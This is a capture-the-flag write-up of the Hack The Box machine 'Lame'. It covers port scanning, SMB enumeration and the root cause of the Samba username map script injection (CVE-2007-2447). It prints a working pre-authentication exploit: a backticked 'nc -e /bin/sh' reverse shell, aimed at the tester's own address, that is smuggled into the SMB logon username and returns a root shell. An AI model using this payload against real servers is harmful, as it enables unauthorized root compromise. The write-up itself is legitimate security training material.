Lame
An end-of-life Samba 3.0.20 server with the 'username map script' option enabled passes the SMB logon username through a shell, so a username containing backticked shell metacharacters yields command execution as root (CVE-2007-2447) — one exploit lands a root shell and both flags.
Overview
Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.
Machine Matrix
The profile is fairly balanced — it leans CTF-like (6.2) and CVE (5.5), reflecting a box solved by a single named CVE (CVE-2007-2447 Samba username-map injection) along a short, guided path, with only moderate enumeration, custom work, and real-life realism around it.
Recon
| Port | Service | Notes |
|---|---|---|
| 21/tcp | vsftpd 2.3.4 | anonymous login allowed; not the intended path |
| 22/tcp | OpenSSH 4.7p1 | Debian 8ubuntu1 |
| 139/tcp | Samba smbd 3.X-4.X | WORKGROUP |
| 445/tcp | Samba smbd 3.0.20-Debian | the intended path |
| 3632/tcp | distccd v1 | GNU 4.2.4 |
A two-stage scan — fast full-port sweep, then version/script scan on the open ports:
1
2
ports=$(nmap -p- --min-rate=1000 -T4 10.129.11.167 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.11.167
A default scan (nmap’s top 1000 TCP ports) finds four open: 21, 22, 139, and 445. The fifth service, 3632/distccd, lives outside the top 1000 — which is exactly why the full -p- sweep above is needed to surface it. FTP on 21 is vsftpd 2.3.4, and the standout is Samba smbd 3.0.20-Debian on 445 (Samba version 3.0.20) — a long-EOL release.
Enumeration
Enumerate SMB. List the shares over a null session:
1
smbclient -N -L //10.129.11.167/
This lists the shares over a null session (-N) and confirms the box is running Samba 3.0.20. That version is the way in — search it for a known exploit:
1
searchsploit "Samba 3.0.20"
This surfaces Samba 3.0.20 < 3.0.25rc3 - ‘Username’ map script’ Command Execution, which is CVE-2007-2447. That CVE is the rest of this box.
CVE-2007-2447
Before firing anything, it’s worth understanding why this works — so the exploit is a thing you reason about.
Samba can translate an incoming SMB username through an external program, configured in smb.conf:
1
2
[global]
username map script = /etc/samba/scripts/mapuser.sh
Every time a client connects, smbd takes the username the client supplied and runs that script to resolve it to a real local account. The bug is in how it runs it. In Samba 3.0.20 the client-supplied username is pasted straight into a shell command line with no sanitisation — conceptually:
1
2
3
/* simplified from the Samba 3.0.x source */
char *cmd = talloc_asprintf(ctx, "%s %s", username_map_script, client_username);
smbrun(cmd, ...); /* smbrun() executes the string via /bin/sh -c */
smbrun() passes the whole string to /bin/sh -c, so the shell parses it. If client_username contains shell metacharacters — backticks, $(), ;, | — the shell executes them. There’s no quoting and no allow-list. (The official fix for CVE-2007-2447 simply rejects usernames containing shell metacharacters before building the command.)
Two things make this devastating:
- It’s pre-auth. The username is read from the client before authentication succeeds — reachable through SMB session-setup and the MS-RPC
SamrChangePasswordcall. No valid credentials are ever needed. - smbd runs as root. Whatever the shell executes runs as root, so this one bug is simultaneously the foothold and the privesc.
So instead of supplying a name, we supply a command disguised as a name. The ./= (or /=) prefix keeps the token shaped like a username while the backticks carry the payload:
1
./=`nohup nc -e /bin/sh 10.10.16.13 4444`
smbd builds mapuser.sh ./= + the output of running our reverse shell, and the backticked command fires as root.
What Metasploit’s usermap_script module does is exactly this and nothing more — it opens an SMB session and stuffs the same backticked payload into the username field. There’s no hidden machinery, which is why we can reproduce it by hand with smbclient and skip msfconsole entirely.
Foothold
No Metasploit needed. Start a listener, open an unauthenticated SMB session, and supply a username whose backticked payload is your reverse shell. The ./= prefix keeps the string parseable as a username while the backticks run the command.
1
2
# terminal 1: listener
nc -lnvp 4444
1
2
3
4
5
# terminal 2: deliver the malicious username over SMB
smbclient -N //10.129.11.167/tmp
# at the smb: \> prompt, type:
logon "./=`nohup nc -e /bin/sh 10.10.16.13 4444`"
# then press ENTER at the Password: prompt (leave it blank)
The listener catches a shell. Because smbd runs as root, the username injection executes in a root context — so exploiting CVE-2007-2447 returns a shell as root. Confirm and upgrade it:
1
2
3
id
# uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
Flags
smbd runs as root, so CVE-2007-2447 fired in a root context — the foothold shell is already a root shell (uid=0(root)). There’s no privesc step; both flags read straight from here:
1
cat /home/makis/user.txt /root/root.txt
Full compromise: root on Lame from a single unauthenticated Samba exploit — no privilege escalation required.